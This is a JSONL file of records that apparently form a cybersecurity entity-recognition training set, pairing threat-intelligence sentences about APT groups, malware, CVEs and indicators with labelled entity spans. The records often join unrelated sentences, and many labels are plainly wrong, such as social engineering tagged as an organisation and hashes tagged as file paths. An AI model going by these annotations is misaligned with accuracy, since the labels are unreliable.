{"text": "The Trojan also employs various obfuscation methods : from the simplest , such as string concatenation and renaming of classes and methods , to implementing functions in native code and embedding SO libraries in C/C++ in the APK file , which requires the use of additional tools or dynamic analysis for deobfuscation , since most tools for static analysis of Android apps support only Dalvik bytecode . TG-3390 actors keep track of and leverage existing ASPXTool web shells in their operations , preferring to issue commands via an internally accessible web shell rather than HTTPBrowser or PlugX . Also aware of the existing laws in Europe , they can avoid prosecution in certain countries as long as they avoid attacking them . The high similarity of the fake job recruitment campaigns both groups used to disguise their attacks , and the fact that Lazarus relied on similar versions of Rising Sun in activity tracked in 2017 , point to a connection between the two adversaries .", "spans": {"THREAT_ACTOR: TG-3390": [[403, 410]], "TOOL: ASPXTool web shells": [[454, 473]], "TOOL: HTTPBrowser": [[576, 587]], "TOOL: PlugX": [[591, 596]], "TOOL: Lazarus": [[851, 858]]}, "info": {"id": "cyberner_stix_train_002737", "source": "cyberner_stix_train"}}
{"text": "] download . FireEye iSIGHT Intelligence confirmed that since at least November 2017 , APT37 exploited a zero-day Adobe Flash vulnerability , CVE-2018-4878 , to distribute DOGCALL malware to South Korean victims . events.exe : b1fa803c19aa9f193b67232c9893ea57574a2055791b3de9f836411ce000ce31 , c981273c32b581de824e1fd66a19a281 , GCC compiler in MinGW environment version 2.24, I386 Windows GUI EXE . Camouflaging itself as legitimate software , the executable is exceptionally large at 56 MB an unusual size for malware samples that may allow it to avoid detection as vendors typically avoid large file sizes .", "spans": {"ORGANIZATION: FireEye iSIGHT Intelligence": [[13, 40]], "THREAT_ACTOR: APT37": [[87, 92]], "VULNERABILITY: zero-day Adobe Flash vulnerability": [[105, 139]], "VULNERABILITY: CVE-2018-4878": [[142, 155]], "TOOL: DOGCALL malware": [[172, 187]], "FILEPATH: events.exe": [[214, 224]], "FILEPATH: b1fa803c19aa9f193b67232c9893ea57574a2055791b3de9f836411ce000ce31": [[227, 291]], "FILEPATH: c981273c32b581de824e1fd66a19a281": [[294, 326]], "TOOL: GCC": [[329, 332]], "TOOL: MinGW": [[345, 350]], "SYSTEM: Windows": [[382, 389]], "TOOL: GUI": [[390, 393]], "TOOL: EXE": [[394, 397]]}, "info": {"id": "cyberner_stix_train_002738", "source": "cyberner_stix_train"}}
{"text": "In this case , a small group reusing exploit code , some powershell-based malware and mostly social engineering has been able to steal sensitive documents and data from victims since at least November 2015 . Where they exist , they often use grey market or pirated software .", "spans": {"THREAT_ACTOR: group": [[23, 28]], "TOOL: powershell-based malware": [[57, 81]], "ORGANIZATION: social engineering": [[93, 111]], "MALWARE: grey market": [[242, 253]], "MALWARE: pirated software": [[257, 273]]}, "info": {"id": "cyberner_stix_train_002739", "source": "cyberner_stix_train"}}
{"text": "These kinds of threats will become more common , as more and more companies decide to publish their software directly to consumers . Machete is still very active at the time of this publication , regularly introducing changes to its malware , infrastructure and spearphishing campaigns . APT37 ( Reaper ) , another North Korean state-sponsored group , targeted a Middle Eastern financial company , but there was no evidence of financial fraud .", "spans": {"THREAT_ACTOR: Machete": [[133, 140]], "TOOL: malware": [[233, 240]], "THREAT_ACTOR: APT37": [[288, 293]], "THREAT_ACTOR: Reaper": [[296, 302]], "ORGANIZATION: financial company": [[378, 395]]}, "info": {"id": "cyberner_stix_train_002740", "source": "cyberner_stix_train"}}
{"text": "Previous work published by security vendor FireEye in October 2014 suggests APT28 might be of Russian origin . The Buckeye attack group had been active since at least 2009 , when it began mounting a string of espionage attacks , mainly against organizations based in the U.S .", "spans": {"ORGANIZATION: FireEye": [[43, 50]], "THREAT_ACTOR: APT28": [[76, 81]], "THREAT_ACTOR: Buckeye": [[115, 122]]}, "info": {"id": "cyberner_stix_train_002741", "source": "cyberner_stix_train"}}
{"text": "] com www [ . More recently in 2016 , Arbor Networks reported on connected malware operations continuing to target these same groups , which the Communist Party of China perceives as a threat to its power . The updates are significant for both of the longstanding malware families ; before this year , Aumlib had not changed since at least May 2011, and Ixeshe had not evolved since at least December 2011 . There are different installation flows for this campaign , but we will focus on the one that uses a URL shortcut .", "spans": {"ORGANIZATION: Arbor Networks": [[38, 52]], "MALWARE: Aumlib": [[302, 308]], "SYSTEM: a URL shortcut": [[506, 520]]}, "info": {"id": "cyberner_stix_train_002742", "source": "cyberner_stix_train"}}
{"text": "The first campaign identifier , found in the sample compiled on the 5th , references alkavkaz.com , a domain associated with a Turkish website proclaiming to be the “ Chechan [sic] Informational Center ” .", "spans": {"DOMAIN: alkavkaz.com": [[85, 97]]}, "info": {"id": "cyberner_stix_train_002743", "source": "cyberner_stix_train"}}
{"text": "If you haven't heard about it for some reason , I would recommend to read this detailed report by Group-IB , as this APT attacks not only Russian banks , but also banks in more than 25 countries . We believe that this is a new variant of VAMP , indicating that the threat actors behind APT-C-23 are still active and continuously improving their product .", "spans": {"ORGANIZATION: Group-IB": [[98, 106]], "ORGANIZATION: banks": [[146, 151], [163, 168]], "MALWARE: VAMP": [[238, 242]], "THREAT_ACTOR: APT-C-23": [[286, 294]]}, "info": {"id": "cyberner_stix_train_002744", "source": "cyberner_stix_train"}}
{"text": "Analysis of the malware shows that it uses the common string obfuscation of character replacement ( Figure 7 ) : Figure 7 : Encoded Marcher Strings Figure 8 : Decoded Marcher Strings As noted , the application requests extensive permissions during installation ; Figure 9 shows the request to act as device administrator , a particular permission that should very rarely be granted to an app . CIA's malware includes multiple local and remote weaponized zero days , air gap jumping viruses such as Hammer Drill which infects software distributed on CD/DVDs , infectors for removable media such as USBs , systems to hide data in images or in covert disk areas Brutal Kangaroo and to keep its malware infestations going . The group heavily leverages open-source tools and custom payloads for carrying out attacks .", "spans": {"MALWARE: Marcher": [[132, 139], [167, 174]], "THREAT_ACTOR: CIA's": [[394, 399]], "TOOL: Hammer Drill": [[498, 510]], "TOOL: Brutal Kangaroo": [[659, 674]]}, "info": {"id": "cyberner_stix_train_002745", "source": "cyberner_stix_train"}}
{"text": "Unfortunately , we couldn’t identify the initial installer , but we established that the infection started from a malicious file named WFCUpdater.exe .", "spans": {"FILEPATH: WFCUpdater.exe": [[135, 149]]}, "info": {"id": "cyberner_stix_train_002746", "source": "cyberner_stix_train"}}
{"text": "The technique PLATINUM uses to inject code via hot patching was first documented by security researchers in 2013.7 . In this case , it was a group commonly referred to as \" Nitro \" , which was coined by Symantec in its 2011 whitepaper .", "spans": {"THREAT_ACTOR: PLATINUM": [[14, 22]], "ORGANIZATION: Symantec": [[203, 211]]}, "info": {"id": "cyberner_stix_train_002747", "source": "cyberner_stix_train"}}
{"text": "Bears in the Midst : Intrusion Into the Democratic National Committee .", "spans": {"ORGANIZATION: Democratic National Committee": [[40, 69]]}, "info": {"id": "cyberner_stix_train_002748", "source": "cyberner_stix_train"}}
{"text": "One of the purposes of the exfiltration of the contact list is to use them to attack other victims using SMS as an initial vector . The group , which we call Seedworm ( aka MuddyWater ) , has been operating since at least 2017 , with its most recent activity observed in December 2018 . This check is performed to ensure that only one instance of the malware is running at a time . A typical log entry showing access to the PowerShell backend is detailed in the Remote PowerShell HTTP logs , located in , such as in the example below : CrowdStrike incident responders discovered Remote PowerShell logs similar to log entries for ProxyNotShell exploitation to gain initial access , suggesting the attacker leveraged Remote PowerShell .", "spans": {"THREAT_ACTOR: group": [[136, 141]], "THREAT_ACTOR: Seedworm": [[158, 166]], "THREAT_ACTOR: MuddyWater": [[173, 183]], "ORGANIZATION: CrowdStrike incident responders": [[536, 567]], "THREAT_ACTOR: attacker": [[696, 704]], "TOOL: Remote PowerShell": [[715, 732]]}, "info": {"id": "cyberner_stix_train_002749", "source": "cyberner_stix_train"}}
{"text": "Once the file has been downloaded and executed , the new process will launch a legitimate executable , such as “ msiexec.exe ” , and inject code into it .", "spans": {"FILEPATH: msiexec.exe": [[113, 124]]}, "info": {"id": "cyberner_stix_train_002750", "source": "cyberner_stix_train"}}
{"text": "Even when a false flag might also be a possibility , we consider this to be unlikely . The earliest signs of destructive payloads with BlackEnergy go back as far as June 2014 . We discovered one victim from Russia that also triggered a malware detection while staying in North Korea in the past .", "spans": {"THREAT_ACTOR: BlackEnergy": [[135, 146]]}, "info": {"id": "cyberner_stix_train_002751", "source": "cyberner_stix_train"}}
{"text": "Bemstour is specifically designed to deliver a variant of the DoublePulsar backdoor . This activity is a longer tail for the actor than a spearphish ; this is likely based on the Clever Kitten background , which may be focused on web development/application testing .", "spans": {"MALWARE: Bemstour": [[0, 8]], "TOOL: DoublePulsar backdoor": [[62, 83]]}, "info": {"id": "cyberner_stix_train_002752", "source": "cyberner_stix_train"}}
{"text": "The result immediately revealed signs of a suspicious cmd.exe process running as a child of the ACLIENT.EXE process .", "spans": {"FILEPATH: cmd.exe": [[54, 61]], "FILEPATH: ACLIENT.EXE": [[96, 107]]}, "info": {"id": "cyberner_stix_train_002753", "source": "cyberner_stix_train"}}
{"text": "As reported in the CrowdStrike 2018 Global Threat Report , big game hunting was a trend that helped define the criminal threat landscape in 2018 . The latter was one of at least three law firms Butterfly has targeted over the past three years .", "spans": {"ORGANIZATION: law firms": [[184, 193]], "THREAT_ACTOR: Butterfly": [[194, 203]]}, "info": {"id": "cyberner_stix_train_002754", "source": "cyberner_stix_train"}}
{"text": "Along with the executable , two binary files , inject.bin (malicious function code) and imain.bin (malicious control logic) , were deployed as the controller’s payload . PROMETHIUM and NEODYMIUM both used a zero-day exploit that executed code to download a malicious payload .", "spans": {"MALWARE: binary files": [[32, 44]], "MALWARE: imain.bin": [[88, 97]], "THREAT_ACTOR: PROMETHIUM": [[170, 180]], "THREAT_ACTOR: NEODYMIUM": [[185, 194]], "VULNERABILITY: zero-day": [[207, 215]], "VULNERABILITY: exploit": [[216, 223]]}, "info": {"id": "cyberner_stix_train_002755", "source": "cyberner_stix_train"}}
{"text": "Our analysis suggests that the four short numbers are associated with Russian financial institutions , presumably where a victim would be likely to have accounts . The backdoor was delivered via a malicious .rtf file that exploited CVE-2017-0199 . The malware is divided into a couple of layers — each layer downloads a new payload on a cloud provider to get the final RAT developed in python and that uses additional providers such as Twitter and ImgBB . The government even offered a reward of up to $ 10 million for information on Cl0p after several federal agencies in the US fell victim to the gang .", "spans": {"MALWARE: .rtf file": [[207, 216]], "VULNERABILITY: CVE-2017-0199": [[232, 245]], "TOOL: RAT": [[369, 372]], "TOOL: python": [[386, 392]], "TOOL: Twitter": [[436, 443]], "TOOL: ImgBB": [[448, 453]], "ORGANIZATION: government": [[460, 470]], "THREAT_ACTOR: Cl0p": [[534, 538]], "ORGANIZATION: several federal agencies": [[545, 569]], "THREAT_ACTOR: the gang": [[595, 603]]}, "info": {"id": "cyberner_stix_train_002756", "source": "cyberner_stix_train"}}
{"text": "This isn’t a bad thing as it shows a natural grouping of nodes that could be a good candidate to group to help simplify the overall graph and make analysis easier . Shrouded Crossbow targeted privatized agencies and government contractors as well as enterprises in the consumer electronics , computer , healthcare , and financial industries .", "spans": {"MALWARE: it": [[26, 28]], "ORGANIZATION: privatized agencies": [[192, 211]], "ORGANIZATION: government contractors": [[216, 238]], "ORGANIZATION: enterprises": [[250, 261]], "ORGANIZATION: consumer electronics": [[269, 289]], "ORGANIZATION: computer": [[292, 300]], "ORGANIZATION: healthcare": [[303, 313]], "ORGANIZATION: financial industries": [[320, 340]]}, "info": {"id": "cyberner_stix_train_002757", "source": "cyberner_stix_train"}}
{"text": "For enterprises , Trend Micro ’s Smart Protection Suites with XGen™ security , which support Mac systems , infuse high-fidelity machine learning into a blend of threat protection techniques to eliminate security gaps across any user activity and any endpoint .", "spans": {"ORGANIZATION: Trend Micro ’s Smart Protection Suites": [[18, 56]], "ORGANIZATION: XGen™ security": [[62, 76]], "TOOL: Mac": [[93, 96]]}, "info": {"id": "cyberner_stix_train_002758", "source": "cyberner_stix_train"}}
{"text": "On January 12 , 2016 , Cylance published a blog linking an exploit document to the group Mandiant refers to as APT2 and CrowdStrike as \" Putter Panda \" . Attackers using several locations in China have leveraged C&C servers on purchased hosted services in the United States and compromised servers in the Netherlands to wage attacks against global oil , gas , and petrochemical companies , as well as individuals and executives in Kazakhstan , Taiwan , Greece , and the United States to acquire proprietary and highly confidential information .", "spans": {"ORGANIZATION: Cylance": [[23, 30]], "ORGANIZATION: Mandiant": [[89, 97]], "THREAT_ACTOR: APT2": [[111, 115]], "ORGANIZATION: CrowdStrike": [[120, 131]], "THREAT_ACTOR: Putter Panda": [[137, 149]], "THREAT_ACTOR: Attackers": [[154, 163]], "TOOL: C&C": [[212, 215]], "ORGANIZATION: oil": [[348, 351]], "ORGANIZATION: gas": [[354, 357]], "ORGANIZATION: petrochemical companies": [[364, 387]], "ORGANIZATION: executives": [[417, 427]]}, "info": {"id": "cyberner_stix_train_002759", "source": "cyberner_stix_train"}}
{"text": "The imports reveal the use of a second DLL called \" eCommon.dll . Here , we investigate a campaign targeting an Asian government organization . On May 16 , 2019 FireEye 's Advanced Practices team attributed the remaining \" suspected APT33 activity \" ( referred to as GroupB in this blog post ) to APT33 , operating at the behest of the Iranian government .", "spans": {"ORGANIZATION: government organization": [[118, 141]], "ORGANIZATION: FireEye 's Advanced Practices": [[161, 190]], "THREAT_ACTOR: APT33": [[297, 302]]}, "info": {"id": "cyberner_stix_train_002760", "source": "cyberner_stix_train"}}
{"text": "GolfSpy ’ s configurations encoded by a custom algorithm ( right ) and its decoded version ( left ) As shown in Figure 3 , GolfSpy ’ s configurations ( e.g. , C & C server , secret keys ) are encoded by a customized algorithm . ScarCruft is a Korean-speaking and allegedly state-sponsored threat actor that usually targets organizations and companies with links to the Korean peninsula . The new builder inserts random values in the Author and Company metadata fields . Threat actors have been using this business model for a decade - plus , originally known as commodity malware .", "spans": {"MALWARE: GolfSpy": [[0, 7], [123, 130]], "THREAT_ACTOR: ScarCruft": [[228, 237]], "THREAT_ACTOR: Threat actors": [[470, 483]], "MALWARE: commodity malware": [[562, 579]]}, "info": {"id": "cyberner_stix_train_002761", "source": "cyberner_stix_train"}}
{"text": "These requests rely on the end user accepting the permission changes and points to the importance of healthy skepticism when giving applications permissions . We believe Emissary Panda exploited a recently patched vulnerability in Microsoft SharePoint tracked by CVE-2019-0604 , which is a remote code execution vulnerability used to compromise the server and eventually install a webshell . Like all of Gorgon Group 's members , Fudpage 's online profile , infrastructure utilization and standardization , connects them back to Gorgon Group .", "spans": {"THREAT_ACTOR: Emissary Panda": [[170, 184]], "VULNERABILITY: vulnerability": [[214, 227]], "VULNERABILITY: CVE-2019-0604": [[263, 276]], "THREAT_ACTOR: Gorgon Group": [[404, 416], [529, 541]], "MALWARE: infrastructure utilization": [[458, 484]], "MALWARE: standardization": [[489, 504]]}, "info": {"id": "cyberner_stix_train_002762", "source": "cyberner_stix_train"}}
{"text": "According to FireEye , the attackers sent out emails containing malicious documents designed to exploit Microsoft Office vulnerabilities in an effort to deliver a piece of malware dubbed LOWBALL . Turla is a notorious group that has been targeting diplomats .", "spans": {"ORGANIZATION: FireEye": [[13, 20]], "THREAT_ACTOR: attackers": [[27, 36]], "VULNERABILITY: Microsoft Office vulnerabilities": [[104, 136]], "TOOL: LOWBALL": [[187, 194]], "THREAT_ACTOR: Turla": [[197, 202]], "ORGANIZATION: diplomats": [[248, 257]]}, "info": {"id": "cyberner_stix_train_002763", "source": "cyberner_stix_train"}}
{"text": "Two weeks ago , Some Chinese Security Researchers have also detected a bootkit called 'Oldboot ' , possibly the same malware or another variant of it . The fieldwork generated extensive data that allowed us to examine Tibetan information security practices , as well as capture real-time evidence of malware that had penetrated Tibetan computer systems . APT1 uses some tools and techniques that we have not yet observed being used by other groups including two utilities designed to steal email — GETMAIL and MAPIGET . The code is also very similar to the Metasploit version of the exploit , while the payload part of the shellcode has been written by the Miniduke authors re - using the backdoor ’s code .", "spans": {"ORGANIZATION: Tibetan information security practices": [[218, 256]], "ORGANIZATION: Tibetan": [[328, 335]], "THREAT_ACTOR: APT1": [[355, 359]], "TOOL: email": [[490, 495]], "MALWARE: GETMAIL": [[498, 505]], "MALWARE: MAPIGET": [[510, 517]], "THREAT_ACTOR: Miniduke authors": [[657, 673]]}, "info": {"id": "cyberner_stix_train_002764", "source": "cyberner_stix_train"}}
{"text": "Previous work published by security vendor FireEye in October 2014 suggests the group might be of Russian origin .", "spans": {"ORGANIZATION: FireEye": [[43, 50]]}, "info": {"id": "cyberner_stix_train_002765", "source": "cyberner_stix_train"}}
{"text": "A screenshot of the file is depicted below .", "spans": {}, "info": {"id": "cyberner_stix_train_002767", "source": "cyberner_stix_train"}}
{"text": "Upon execution , it will communicate with an attacker-controller website to download a variant of the Pony malware , pm.dll” along with a standard Vawtrak trojan . Moreover , the number of Corkow incidents detected in Q1 2015 in the United States exceeds the number of those in the CIS countries .", "spans": {"MALWARE: Pony malware": [[102, 114]], "MALWARE: pm.dll”": [[117, 124]], "MALWARE: Corkow": [[189, 195]]}, "info": {"id": "cyberner_stix_train_002768", "source": "cyberner_stix_train"}}
{"text": "Quasar is a .NET Framework assembly , loading multiple DLLs upon launch , for example “ dnsapi.dll ” .", "spans": {"MALWARE: Quasar": [[0, 6]], "TOOL: .NET Framework": [[12, 26]], "FILEPATH: dnsapi.dll": [[88, 98]]}, "info": {"id": "cyberner_stix_train_002769", "source": "cyberner_stix_train"}}
{"text": "] today svcws [ . A new version of ShimRat was built on the 7th of September , uploaded to the server and only days later used in a new campaign . The network traffic is encoded with a custom Base64 alphabet . For our Managed Defense Customers , we have launched a Community Protection Event that will provide frequent updates on this threat actor and activity .", "spans": {"TOOL: ShimRat": [[35, 42]], "ORGANIZATION: Managed Defense Customers": [[218, 243]], "THREAT_ACTOR: threat actor": [[335, 347]]}, "info": {"id": "cyberner_stix_train_002770", "source": "cyberner_stix_train"}}
{"text": "Perform penetration testing on web services .", "spans": {"TOOL: web services": [[31, 43]]}, "info": {"id": "cyberner_stix_train_002771", "source": "cyberner_stix_train"}}
{"text": "In part one of this research , we analyze the Spark campaign .", "spans": {"MALWARE: Spark": [[46, 51]]}, "info": {"id": "cyberner_stix_train_002772", "source": "cyberner_stix_train"}}
{"text": "Typically , it is a message saying that the user has received a money transfer , and that they must enter their bank card details so the money can be transferred to their account . The self-extracting RAR writes a legitimate executable , an actor-created DLL called Loader.dll and a file named readme.txt to the filesystem and then executes the legitimate executable . On September 15 and 19 , 2017 , Proofpoint detected and blocked spearphishing emails from this group targeting a US shipbuilding company and a US university research center with military ties .", "spans": {"TOOL: self-extracting RAR": [[185, 204]], "MALWARE: Loader.dll": [[266, 276]], "MALWARE: readme.txt": [[294, 304]], "ORGANIZATION: Proofpoint": [[401, 411]], "TOOL: emails": [[447, 453]], "ORGANIZATION: shipbuilding company": [[485, 505]], "ORGANIZATION: military": [[547, 555]]}, "info": {"id": "cyberner_stix_train_002773", "source": "cyberner_stix_train"}}
{"text": "Require two-factor authentication for all remote access solutions , including OWA .", "spans": {"TOOL: OWA": [[78, 81]]}, "info": {"id": "cyberner_stix_train_002774", "source": "cyberner_stix_train"}}
{"text": "] coupload202 [ . Since early 2013 , we have observed activity from a unique threat actor group , which we began to investigate based on increased activities against human right activists in the beginning of 2015 . When a person types “ google.com ” into a web browser , a DNS translation to an IP address occurs so that the person ’s computer can communicate with Google . This type of attack technique can not be easily mitigated with preventive controls since it is based on the abuse of system features .", "spans": {"ORGANIZATION: activists": [[178, 187]], "DOMAIN: google.com": [[237, 247]], "ORGANIZATION: Google": [[365, 371]]}, "info": {"id": "cyberner_stix_train_002775", "source": "cyberner_stix_train"}}
{"text": "Thanks to the video , we were even able to identify three further apps that contained adware functionality and were available on Google Play . Since Ploutus-D interacts with the Kalignite Platform , only minor modifications to the Ploutus-D code may be required to target different ATM vendors worldwide . In this new , aggressive campaign we see a return of the Bankshot implant , which last appeared in 2017 .", "spans": {"SYSTEM: Google Play": [[129, 140]], "MALWARE: Ploutus-D": [[149, 158], [231, 240]], "ORGANIZATION: ATM vendors": [[282, 293]], "MALWARE: Bankshot": [[363, 371]]}, "info": {"id": "cyberner_stix_train_002776", "source": "cyberner_stix_train"}}
{"text": "This new wave also presents unique attack vectors based on the kind of device it has accessed . The spear-phishing campaign against Asian entities isn't isolated , the admin@338 also started another attack against the US-based think tank on 14th March . Glimpse : 6e86c57385d26a59c0df1580454b9967 . In terms of the fallout , it ’s tough to overstate the havoc Cl0p was able to wreck thanks to the zero - day .", "spans": {"THREAT_ACTOR: admin@338": [[168, 177]], "ORGANIZATION: think tank": [[227, 237]], "MALWARE: Glimpse": [[254, 261]], "FILEPATH: 6e86c57385d26a59c0df1580454b9967": [[264, 296]], "THREAT_ACTOR: Cl0p": [[360, 364]], "VULNERABILITY: zero - day": [[397, 407]]}, "info": {"id": "cyberner_stix_train_002777", "source": "cyberner_stix_train"}}
{"text": "At DNC , COZY BEAR intrusion has been identified going back to summer of 2015 , while FANCY BEAR separately breached the network in April 2016 .", "spans": {"ORGANIZATION: DNC": [[3, 6]], "THREAT_ACTOR: COZY BEAR": [[9, 18]], "THREAT_ACTOR: FANCY BEAR": [[86, 96]]}, "info": {"id": "cyberner_stix_train_002778", "source": "cyberner_stix_train"}}
{"text": "Hosting mostly was provided at Fast Serv Inc and resellers , in all likelihood related to bitcoin payment processing .", "spans": {}, "info": {"id": "cyberner_stix_train_002779", "source": "cyberner_stix_train"}}
{"text": "At the end of June 2015 Mofang started its campaign to gather information of a specific target in relation to the sezs : the cpg Corporation . Within six hours of entering the environment , the threat actors compromised multiple systems and stole credentials for the entire domain .", "spans": {"ORGANIZATION: cpg Corporation": [[125, 140]]}, "info": {"id": "cyberner_stix_train_002780", "source": "cyberner_stix_train"}}
{"text": "An examination of the hillaryclinton.com DNS records shows that the domain's MX records , which indicate the mail server used by the domain , point to aspmx.l.google.com , the mail server used by Google Apps .", "spans": {"DOMAIN: hillaryclinton.com": [[22, 40]], "TOOL: MX": [[77, 79]], "DOMAIN: aspmx.l.google.com": [[151, 169]], "ORGANIZATION: Google": [[196, 202]]}, "info": {"id": "cyberner_stix_train_002781", "source": "cyberner_stix_train"}}
{"text": "Suckfly 's targets are displayed in figure 2 by their industry , which provides a clearer view of the group ’s operations .", "spans": {"THREAT_ACTOR: Suckfly": [[0, 7]]}, "info": {"id": "cyberner_stix_train_002782", "source": "cyberner_stix_train"}}
{"text": "We believe that , when it is officially released , it will most likely be uploaded to rogue APK stores and other shady websites , while masquerading as real applications . The files exploit the well-known Microsoft Office vulnerability , CVE-2012-0158 , to execute malicious code in order to take control of the targeted systems . APT threat actors , most likely nation state-sponsored , targeted a diplomat in the French Ministry of Foreign Affairs with a seemingly legitimate invitation to a technology conference in Taiwan .", "spans": {"MALWARE: files": [[176, 181]], "VULNERABILITY: Microsoft Office vulnerability": [[205, 235]], "VULNERABILITY: CVE-2012-0158": [[238, 251]], "THREAT_ACTOR: APT threat actors": [[331, 348]], "ORGANIZATION: diplomat": [[399, 407]]}, "info": {"id": "cyberner_stix_train_002783", "source": "cyberner_stix_train"}}
{"text": "The culprit FLV file is embedded within AS3 in two chunks , and is reassembled at runtime .", "spans": {"TOOL: FLV": [[12, 15]]}, "info": {"id": "cyberner_stix_train_002784", "source": "cyberner_stix_train"}}
{"text": "Also , command communications with the malware are parsed with a function named “ chuli ( ) ” prior to POSTing stolen data to the command-and-control server . Execute a command through exploits for CVE-2017-11882 . The Middle Eastern hacker group in this case is codenamed \" BlackOasis \" Kaspersky found the group was exploiting a Adobe Flash Player zero-day vulnerability ( CVE-2016-4117 ) to remotely deliver the latest version of \" FinSpy \" malware , according to a new blog post published Monday .", "spans": {"VULNERABILITY: CVE-2017-11882": [[198, 212]], "THREAT_ACTOR: BlackOasis": [[275, 285]], "ORGANIZATION: Kaspersky": [[288, 297]], "TOOL: Adobe Flash Player": [[331, 349]], "VULNERABILITY: zero-day": [[350, 358]], "VULNERABILITY: CVE-2016-4117": [[375, 388]], "MALWARE: FinSpy": [[435, 441]]}, "info": {"id": "cyberner_stix_train_002785", "source": "cyberner_stix_train"}}
{"text": "One of these , called Marcher ( aka Exobot ) , seems to be especially active with different samples appearing on a daily basis . PLEAD uses spear-phishing emails to deliver and install their backdoor , either as an attachment or through links to cloud storage services . After that , the count for each port starts declining sharply . A clever example was ‘ Office Monkeys LOL Video.zip ’ .", "spans": {"MALWARE: Marcher": [[22, 29]], "MALWARE: Exobot": [[36, 42]], "TOOL: cloud storage services": [[246, 268]]}, "info": {"id": "cyberner_stix_train_002786", "source": "cyberner_stix_train"}}
{"text": "WolfRAT is based on a previously leaked malware named DenDroid . Once BARIUM has established rapport , they spear-phish the victim using a variety of unsophisticated malware installation vectors , including malicious shortcut ( .lnk ) files with hidden payloads , compiled HTML help ( .chm ) files , or Microsoft Office documents containing macros or exploits . The malware samples used in this campaign were not very complicated by nature but do give the attackers almost complete control over their targets ’ compromised systems . We first heard of this new campaign thanks to a Mastodon post by Randy McEoin .", "spans": {"MALWARE: WolfRAT": [[0, 7]], "MALWARE: DenDroid": [[54, 62]], "TOOL: unsophisticated malware": [[150, 173]], "TOOL: malicious shortcut": [[207, 225]], "MALWARE: .lnk": [[228, 232]], "TOOL: HTML help ( .chm ) files": [[273, 297]], "TOOL: Microsoft Office documents": [[303, 329]], "ORGANIZATION: Mastodon": [[581, 589]], "ORGANIZATION: Randy McEoin": [[598, 610]]}, "info": {"id": "cyberner_stix_train_002787", "source": "cyberner_stix_train"}}
{"text": "An in-depth understanding of the “ Agent Smith ’ s campaign C & C infrastructure enabled us to reach the conclusion that the owner of “ i * * * e.com ” , “ h * * * g.com ” is the group of hackers behind “ Agent Smith ” . Without going too deep into the rabbit hole , there are several indicators pointing to an Iranian nexus , including language artifacts in the tool-marks used by the attacker , as well as network activity tying this actor to a very specific location that we have high confidence in not being spoofed . Furthermore , the tasks allow Dexphot to conveniently update the payload from the web every time the tasks run . We recommend following Microsoft ’s guidance and patching Exchange Server immediately to mitigate this activity .", "spans": {"MALWARE: Agent Smith": [[35, 46], [205, 216]], "MALWARE: Dexphot": [[552, 559]]}, "info": {"id": "cyberner_stix_train_002788", "source": "cyberner_stix_train"}}
{"text": "After the executable is executed , it downloads Pony and Vawtrak malware variants to steal data . Operation Erebus leverages another Flash Player exploit ( CVE-2016-4117 ) through the use of watering hole attacks .", "spans": {"MALWARE: Pony": [[48, 52]], "MALWARE: Vawtrak": [[57, 64]], "TOOL: Flash Player": [[133, 145]], "VULNERABILITY: exploit": [[146, 153]], "VULNERABILITY: CVE-2016-4117": [[156, 169]]}, "info": {"id": "cyberner_stix_train_002789", "source": "cyberner_stix_train"}}
{"text": "We do not have detailed visibility into the specific host attacked , and have not been able to reproduce the second stage of the attack in our lab .", "spans": {}, "info": {"id": "cyberner_stix_train_002790", "source": "cyberner_stix_train"}}
{"text": "Hoster : The sites hosting malware ; if malware is not directly attached to email , then macro enabled documents , malicious scripts , or exploit kits will pull payloads from these servers .", "spans": {"TOOL: email": [[76, 81]], "TOOL: macro": [[89, 94]]}, "info": {"id": "cyberner_stix_train_002791", "source": "cyberner_stix_train"}}
{"text": "North Korea linked hackers are among the most prolific nation-state threats , targeting not only the U.S. and South Korea but the global financial system and nations worldwide . The NetTraveler group has infected victims across multiple establishments in both the public and private sector including government institutions , embassies , the oil and gas industry , research centers , military contractors and activists .", "spans": {"ORGANIZATION: financial": [[137, 146]], "ORGANIZATION: nations": [[158, 165]], "ORGANIZATION: government institutions": [[300, 323]], "ORGANIZATION: embassies": [[326, 335]], "ORGANIZATION: oil and gas industry": [[342, 362]], "ORGANIZATION: military contractors": [[384, 404]], "ORGANIZATION: activists": [[409, 418]]}, "info": {"id": "cyberner_stix_train_002792", "source": "cyberner_stix_train"}}
{"text": "We assess that this was an anti-forensics technique to hide the presence of the attacker code on the Triconex controller . Some of the documents exploited CVE-2017-0199 to deliver the payload .", "spans": {"THREAT_ACTOR: attacker": [[80, 88]], "TOOL: Triconex controller": [[101, 120]], "FILEPATH: documents": [[135, 144]], "VULNERABILITY: CVE-2017-0199": [[155, 168]]}, "info": {"id": "cyberner_stix_train_002793", "source": "cyberner_stix_train"}}
{"text": "gop.com — used by the Republican National Committee , donaldjtrump.com — used by the Donald Trump campaign , johnkasich.com — used by the John Kasich campaign .", "spans": {"DOMAIN: gop.com": [[0, 7]], "ORGANIZATION: Republican National Committee": [[22, 51]], "DOMAIN: donaldjtrump.com": [[54, 70]], "DOMAIN: johnkasich.com": [[109, 123]]}, "info": {"id": "cyberner_stix_train_002794", "source": "cyberner_stix_train"}}
{"text": "EventBot ’ s request to use accessibility services . Bemstour is specifically designed to deliver a variant of the DoublePulsar backdoor . In addition to the malware evolution , the actors also shifted from solely spear-phishing targets with attachments to also compromising legitimate websites to host malware .", "spans": {"MALWARE: Bemstour": [[53, 61]], "TOOL: DoublePulsar backdoor": [[115, 136]], "THREAT_ACTOR: actors": [[182, 188]]}, "info": {"id": "cyberner_stix_train_002795", "source": "cyberner_stix_train"}}
{"text": "The library includes such operations as : Get address of cybercriminal C & C server Get configuration file with web injects from C & C , as well as default list of injects Scan for app package names that generated AccessibilityEvent events in the list of known banking/antivirus/other popular apps Set malware as default SMS app Get address of the phishing page that opens when the app runs , and others getStartWebUrl function – get address of phishing page The configuration file contains a list of injects for mobile banking apps – links to phishing pages matching the mobile McAfee Advanced Threat research determines with confidence that Lazarus is the threat group behind this attack for the following reasons:Contacts an IP address / domain that was used to host a malicious document from a Lazarus previous campaign in 2017 . In this version , a shortcut is created in order to launch winnit.exe in the following path %USERPROFILE%\\Start Menu\\Programs\\Startup\\Anti virus service.lnk .", "spans": {"ORGANIZATION: McAfee": [[579, 585]], "THREAT_ACTOR: Lazarus": [[643, 650], [798, 805]], "MALWARE: malicious document": [[772, 790]], "FILEPATH: winnit.exe": [[893, 903]], "FILEPATH: %USERPROFILE%\\Start Menu\\Programs\\Startup\\Anti virus service.lnk": [[926, 990]]}, "info": {"id": "cyberner_stix_train_002796", "source": 